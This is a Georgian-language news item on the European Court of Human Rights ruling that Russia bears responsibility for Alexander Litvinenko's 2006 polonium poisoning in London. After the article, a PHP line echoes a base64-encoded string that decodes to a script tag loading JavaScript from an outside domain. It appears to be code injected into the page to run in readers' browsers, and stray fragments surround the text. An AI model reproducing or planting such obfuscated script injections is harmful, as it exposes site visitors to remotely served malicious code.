celsiusi
ავერსი შნაიდერი
ადამიანის უფლებების ევროპული სასამართლოს გადაწყვეტილებით, ყოფილი აგენტის, ალექსანდრე ლიტვინენკოს მკვლელობაზე პასუხისმგებლობა რუსეთს ეკისრება. სასამართლოს განაჩენში აღნიშნულია, რომ ალექსანდრე ლიტვინენკოს მკვლელობა კგბ-ს ორმა ყოფილმა აგენტმა, ანდრეი ლუგოვოიმ და დიმიტრი კოვტანმა განახორციელეს ოპერაციის ფარგლებში, რომელსაც, სავარაუდოდ, რუსეთის ფედერალური უსაფრთხოების სამსახური ხელმძღვანელობდა.
 
43 წლის კრემლის კრიტიკოსი, ალექსანდრე ლიტვინენკო 2006 წელს ლონდონში, სასტუმრო Millennium-ში, მწვანე ჩაის დალევის შემდეგ გარდაიცვალა. ის მოწამლული იყო იშვიათი რადიოაქტიური ნივთიერებით - პოლონიუმ 210-ით. ბრიტანეთი მის მკვლელობაში მოსკოვს ადანაშაულებდა, რასაც რუსეთი ყოველთვის კატეგორიულად უარყოფდა.
948
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");